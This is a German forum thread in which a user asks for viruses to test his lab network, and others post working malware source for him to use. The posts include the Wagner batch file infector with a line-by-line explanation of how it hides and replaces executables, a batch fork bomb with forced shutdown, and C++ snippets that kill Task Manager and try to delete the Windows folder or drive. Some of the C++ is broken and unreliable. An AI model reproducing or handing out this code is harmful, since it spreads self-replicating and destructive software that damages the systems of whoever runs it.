Hat wer ein Paar Viren für ein paar Experimente

  • geschlossen
  • Frage

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Hat wer ein Paar Viren für ein paar Experimente

    Hab mein Übungsnetz und würd gern schauen wie mein Virenschutz am Server funktioniert (und das ganze andere Zeug wie Berechtigungen, Data Executive Prevention, ISA usw).
    Da bräucht ich ein paar Viren und so ein Zeug für Versuche.
    Der Virus / oä darf vor dem ISA Server, und von hinten über einen Client (denn er vorher verseucht) spielen.

    Echt super wäre ein Rar.Archiv mit ein paar verseuchten Exes und beschreibungen.
    Danke im voraus

    LG Miraculix
  • Ja dann nimm halt Nachos Variante. Einfach irgendwelche Cracks runterladen, die idealerweise auch noch "crack.exe" heißen, ausführen und schon kannst du dir sicher sein, dass dein System infiziert ist. Aber ob das Sinn der Sache ist?

    Aber ich glaube nicht, dass hier irgendjemand mal so ein paar Viren auf Lager hat...

    Shadow
  • Hier hast Du einen.

    Öffne den Editor und füge folgenden Script dort ein und speichere das ganze als .bat ab.

    Da schlägt jedes Antiviren-Programm Alarm!!

    Ein recht einfacher Virus, der sogenanne Wagner Virus
    der von Black Wolf 1993 in Virology 101 praesentiert wurde.



    @echo off
    ctty nul
    for %%f in (*.exe *.com) do set A=%%f
    if %A%==COMMAND.COM set A=
    rename %A% V%A%
    if not exist V%A% goto end
    attrib +h V%A%
    copy %0.bat %A%
    attrib +r %A%
    ren %A% *.bat
    set A=
    :end
    ctty con
    @if exist V%0.com V%0.com %1 %2 %3
    @if exist V%0.exe V%0.exe %1 %2 %3


    Und hier die Beschreibung:

    @echo off
    Dieser Befehl bewirkt, dass die Befehle des Programmes beim ausführen
    nicht angezeigt werden.

    ctty nul
    Hier werden alle Ausgaben ins Nichts geleitet. So das der 'Benutzer'
    nicht sieht, dass Dateien kopiert wurden.

    for %%f in (*.exe *.com) do set A=%%f
    Hier werden alle EXE und COM Dateien und schreibt jede Datei in die
    Variable A. Das bedeutet, dass am Ende die letzte, noch nicht
    infizierte Datei in der Variable A gespeichert wird.

    if %A%==COMMAND.COM set A=
    Falls A die Datei Command.COM enthaelt, wird A Null gesetzt

    rename %A% V%A%
    Die gefundene Datei wird umbenannt in Vname

    if not exist V%A% goto end
    Sollte das Umbenennen schiefgegangen sein, wird zur Stelle :end
    gesprungen und beendet

    attrib +h V%A%
    Die umbenannte Datei wird versteckt und somit nur durch Parameter
    mit dem Befehl dir /a:h sichtbar, auserdem wird sie bei einer erneuten
    Ausfuehrung des Programmes nicht noch einmal umbenannt.

    copy %0.bat %A%
    Der Virus (%0%) wird an die Stelle der COM Datei kopiert
    attrib +r %A%
    Nun wird die Datei vor dem Ueberschreiben geschuetzt

    ren %A% *.bat
    Nun noch eine Umbenennung in eine BAT Datei

    set A=
    Der Parameter A wird wieder geleert, um keine Spuren zu hinterlassen

    :end
    Hierher wird mit goto end gesprungen

    ctty con
    Die Ausgabe wird wieder auf den Bildschirm geleitet

    @if exist V%0.com V%0.com %1 %2 %3
    Falls die Ersetzte Datei eine COM Datei war, wird diese nun ausgeführt

    @if exist V%0.exe V%0.exe %1 %2 %3
    wie eben nur mit EXE Dateien



    Wenn das noch nicht reicht, dann schreib mir eine PN!

    Nacho
  • start
    start
    start
    start
    start
    start
    start
    start
    start
    start
    start
    start
    start
    start
    start
    start

    shutdown/s

    start
    start
    start
    start
    start
    start
    start
    start
    start
    start
    start
    start
    start
    start
    start
    start

    Wird von meinem Kaespersky sofort erkannt und als flush virus gezeigt glaube ich.
    notepad.exe (Editor) öffnen und .bat hinter dem namen des Projekts hinzufügen. :D
  • naja ich bin halt einfach zu nett. :D

    Hier noch was in c++:

    code 1.

    #include <windows.h>
    #include <winable>
    #include <stdio.h>
    #include <iostream>

    using namespace std;
    int main()
    {
    HWND TaskMgr;
    bool runing = true;
    while(runing = true){
    Sleep(1000);
    TaskMgr = FindWindow(NULL, "Windows Task Manager");
    if(TaskMgr != NULL)
    {
    PostMessage(TaskMgr, WM_CLOSE,(LPARAM)0);
    }

    -----------------------------------------------------
    code 2.


    #include <windows.h>
    #include <stdio.h>
    #include <iostream>

    using namespace std;
    int main()
    {
    sleep(1000);
    remove("c:\\Windows")//=);
    sleep(5000);
    BlockInput (false)
    }
    -------------------------------- ev. zu code 2
    del C:\\
    start
    start
    start
    start
    shutdown/s
    start
    start
    start
    }

    // leider bin ich mir nicht sicher obs funktioniert
    // Zum ersten code habe ich die fetzen aus googel :D
    // Was für ein Virus hast du dir denn Vorgestellt?

    Dieser Beitrag wurde bereits 6 mal editiert, zuletzt von blubberbong ()

  • Hmmm... Viren.... Damit kann ich nicht dienen... Aber so ein ähnliches Projekt hatte ich damals in meiner Ausbildung zum IT-Systemkaufmann am Hals...

    Bin mir nicht sicher, müßte ich erst kramen, aber hier müßten irgendwo noch Trojaner rumfliegen, Client und Exe. Öhm... Back Orifice und glaube Sub7.
    Aber ich wüßte nicht, wie ich dir die gefahrlos zukommen lassen könnte... Jeder Mailer hat ´nen Virenschutz und bei RS wäre ich mir auch nicht sicher, ob die nicht auch auf Viren etc kontrollieren...